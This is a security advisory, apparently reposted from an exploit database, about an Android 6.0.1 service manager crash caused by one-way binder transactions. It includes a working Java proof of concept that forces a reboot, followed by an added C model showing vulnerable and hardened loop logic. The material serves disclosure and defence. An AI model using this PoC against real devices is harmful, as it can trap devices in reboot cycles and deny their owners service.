Android: Service Manager Crashes on One Way Binder Transaction

Platform: Tested on Android 6.0.1, February patches
Class: Local DoS

Summary:

If an application sends a one-way binder transaction to the service manager, the service manager tries to send a reply, which fails. This causes the service manager to exit its binder loop and the process dies, causing the system to reboot.

Description:

The service manager binder loop isn't very tolerant of failure: any problem with the binder causes the main loop to exit and the service manager process to close. This has a knock-on effect on the entire device. As the service manager is crucial for the operation of the platform, its going away causes many other services to fail, leading to a reboot of at least the UI, if not the entire device.

Failure of the binder itself is perhaps something which can't be guarded against, but there is one failure which could be anticipated: a client sending a one-way transaction. When a client sends one, the service manager code in /frameworks/native/cmds/servicemanager/binder.c tries to send a reply. As the transaction isn't expecting a reply, the reply fails with a BR_FAILED_REPLY status, which causes binder_parse to return -1. This error propagates back to binder_loop with the following code:

    if (res < 0) {
        ALOGE("binder_loop: io error %d %s\n", res, strerror(errno));
        break;
    }

This causes the loop to exit, which means the service manager exits.

Proof of Concept:

I've provided a PoC which exploits the issue and causes the device to reboot. Depending on the device and OS version this seems to either cause a very temporary condition or a reboot cycle which needs a hard reboot to fix. To use, copy the following code into an application and call it.
    // Imports needed by the snippet below (place at the top of the source file).
    import android.os.Binder;
    import android.os.IBinder;
    import android.os.Parcel;
    import android.os.RemoteException;
    import java.lang.reflect.InvocationTargetException;
    import java.lang.reflect.Method;

    // Minimal Binder object to hand to the service manager as a "service".
    static class IExampleServer extends Binder { }

    void runServiceManagerCrash() throws ClassNotFoundException, NoSuchMethodException,
            InvocationTargetException, IllegalAccessException, RemoteException {
        // Obtain the raw service manager context object via reflection.
        Class c = Class.forName("com.android.internal.os.BinderInternal");
        Method m = c.getMethod("getContextObject");
        IBinder serviceManager = (IBinder) m.invoke(null);

        Parcel data = Parcel.obtain();
        Parcel reply = Parcel.obtain();
        data.writeInterfaceToken("android.os.IServiceManager");
        data.writeString("IExampleServer");
        data.writeStrongBinder(new IExampleServer());
        data.writeInt(0);

        // Transaction code 3 sent with FLAG_ONEWAY: the service manager's reply
        // cannot be delivered, which is the failure described above.
        serviceManager.transact(3, data, reply, IBinder.FLAG_ONEWAY);
    }

This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.

Reported in AOSP as https://code.google.com/p/android/issues/detail?id=200612

The developers have stated that this is fixed in the next version of Android and will not be backported. Marking as fixed for that reason.

Found by: forshaw

# Iranian Exploit DataBase = http://IeDb.Ir [2016-04-29]
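The following is an added illustration of the mitigation side of the report, not code from AOSP or from the original write-up. It models the shape of servicemanager's binder_parse/binder_loop pair with a constructed work queue and locally defined constants (TF_ONE_WAY, BR_TRANSACTION, BR_FAILED_REPLY and so on are assumptions that only mirror the names of the real binder definitions; the real kernel/userspace interface is not used). The "vulnerable" parser replies to every transaction and bails out of the loop on any negative result, which is the behaviour described above; the "hardened" parser checks the one-way flag before replying and treats a failed reply as a per-transaction error rather than a reason to leave the loop.

```c
/* Simplified model of servicemanager's binder loop (added illustration, not AOSP code).
 * All constants, structs and the work queue are constructed for this example. */
#include <stdio.h>
#include <stddef.h>

#define TF_ONE_WAY 0x01u  /* assumed one-way transaction flag (simplified model) */

/* Local stand-ins for the binder return commands the loop reacts to. */
enum br_cmd { BR_NOOP, BR_TRANSACTION, BR_FAILED_REPLY, BR_DEAD_BINDER };

struct txn { unsigned flags; unsigned code; };
struct work_item { enum br_cmd cmd; struct txn txn; };

struct loop_stats {
    int handled;          /* transactions dispatched to the handler */
    int replies_sent;     /* replies accepted by the (modelled) kernel */
    int skipped_replies;  /* one-way transactions deliberately left unanswered */
    int exited_early;     /* 1 if the loop stopped before draining its queue */
};

/* Models the kernel's reaction to a reply: a reply to a one-way transaction
 * cannot be delivered, which is what surfaces as BR_FAILED_REPLY in practice. */
static int kernel_accept_reply(const struct txn *t) {
    return (t->flags & TF_ONE_WAY) ? -1 : 0;
}

/* Vulnerable shape: reply unconditionally; any negative result ends the loop. */
static int parse_vulnerable(const struct work_item *w, struct loop_stats *st) {
    switch (w->cmd) {
    case BR_TRANSACTION:
        st->handled++;
        if (kernel_accept_reply(&w->txn) < 0)
            return -1;              /* failed reply -> binder_parse returns -1 */
        st->replies_sent++;
        return 0;
    case BR_FAILED_REPLY:
    case BR_DEAD_BINDER:
        return -1;
    default:
        return 0;
    }
}

/* Hardened shape: never reply to a one-way transaction, and log a failed reply
 * instead of abandoning the loop; only a dead binder is treated as fatal. */
static int parse_hardened(const struct work_item *w, struct loop_stats *st) {
    switch (w->cmd) {
    case BR_TRANSACTION:
        st->handled++;
        if (w->txn.flags & TF_ONE_WAY) {
            st->skipped_replies++;  /* the sender is not waiting for an answer */
            return 0;
        }
        if (kernel_accept_reply(&w->txn) < 0)
            return 0;               /* unexpected, but not fatal to the service */
        st->replies_sent++;
        return 0;
    case BR_FAILED_REPLY:
        fprintf(stderr, "reply failed for code %u, continuing\n", w->txn.code);
        return 0;
    case BR_DEAD_BINDER:
        return -1;
    default:
        return 0;
    }
}

typedef int (*parse_fn)(const struct work_item *, struct loop_stats *);

/* Drains a constructed work queue the way binder_loop() drains ioctl reads.
 * Returns the number of transactions handled before the loop stopped. */
static int run_loop(parse_fn parse, const struct work_item *q, size_t n,
                    struct loop_stats *st) {
    *st = (struct loop_stats){0};
    for (size_t i = 0; i < n; i++) {
        if (parse(&q[i], st) < 0) {
            st->exited_early = 1;   /* the "break" that takes servicemanager down */
            break;
        }
    }
    return st->handled;
}

/* Constructed sample: a normal call, a one-way call (as in the PoC), another normal call. */
static const struct work_item sample_queue[] = {
    { BR_TRANSACTION, { 0,          3 } },
    { BR_TRANSACTION, { TF_ONE_WAY, 3 } },
    { BR_TRANSACTION, { 0,          2 } },
};
static const size_t sample_len = sizeof sample_queue / sizeof sample_queue[0];

/* Small wrappers over the sample queue so results can be inspected by name. */
static int vulnerable_handled(void)       { struct loop_stats s; return run_loop(parse_vulnerable, sample_queue, sample_len, &s); }
static int vulnerable_exits_early(void)   { struct loop_stats s; run_loop(parse_vulnerable, sample_queue, sample_len, &s); return s.exited_early; }
static int hardened_handled(void)         { struct loop_stats s; return run_loop(parse_hardened, sample_queue, sample_len, &s); }
static int hardened_exits_early(void)     { struct loop_stats s; run_loop(parse_hardened, sample_queue, sample_len, &s); return s.exited_early; }
static int hardened_skipped_replies(void) { struct loop_stats s; run_loop(parse_hardened, sample_queue, sample_len, &s); return s.skipped_replies; }

int main(void) {
    printf("vulnerable: handled=%d exited_early=%d\n", vulnerable_handled(), vulnerable_exits_early());
    printf("hardened:   handled=%d skipped_replies=%d exited_early=%d\n",
           hardened_handled(), hardened_skipped_replies(), hardened_exits_early());
    return 0;
}
```

On the constructed queue the vulnerable loop handles two transactions and stops at the one-way call, while the hardened loop handles all three and records one skipped reply. The point for a defender is that the one-way flag is known to the receiver before it decides to reply, so this particular failure is avoidable without any change to how genuine I/O errors are treated.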